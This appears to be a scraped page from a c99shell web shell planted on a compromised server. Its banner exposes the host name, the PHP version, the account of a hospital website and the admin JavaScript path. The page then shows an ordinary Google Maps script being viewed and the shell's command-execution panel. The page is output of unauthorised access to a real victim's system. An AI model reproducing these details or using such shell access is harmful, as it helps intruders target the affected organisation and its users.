Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /home/katebhospital/public_html/admin/js/ drwxr-xr-x |
Viewing file: Select action/file-type: (function ($) { "use strict"; // Start of use strict // map var myLatLng = { lat: 40.6971494, lng: -74.2598712 }; // Create a map object and specify the DOM element // for display. var map = new google.maps.Map(document.getElementById('gmap'), { center: myLatLng, zoom: 3 }); // Create a marker and set its position. var mapMarker = new google.maps.Map(document.getElementById('gmap-marker'), { center: myLatLng, zoom: 3 }); var marker = new google.maps.Marker({ map: mapMarker, position: myLatLng, title: 'Hello World!' }); // route map var routeMap = new google.maps.Map(document.getElementById('routeMap'), { zoom: 2, center: { lat: 0, lng: -180 }, mapTypeId: 'terrain' }); var flightPlanCoordinates = [ { lat: 37.772, lng: -122.214 }, { lat: 21.291, lng: -157.821 }, { lat: -18.142, lng: 178.431 }, { lat: -27.467, lng: 153.027 } ]; var flightPath = new google.maps.Polyline({ path: flightPlanCoordinates, geodesic: true, strokeColor: '#FF0000', strokeOpacity: 1.0, strokeWeight: 2 }); flightPath.setMap(routeMap); })(jQuery); |
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0031 ]-- |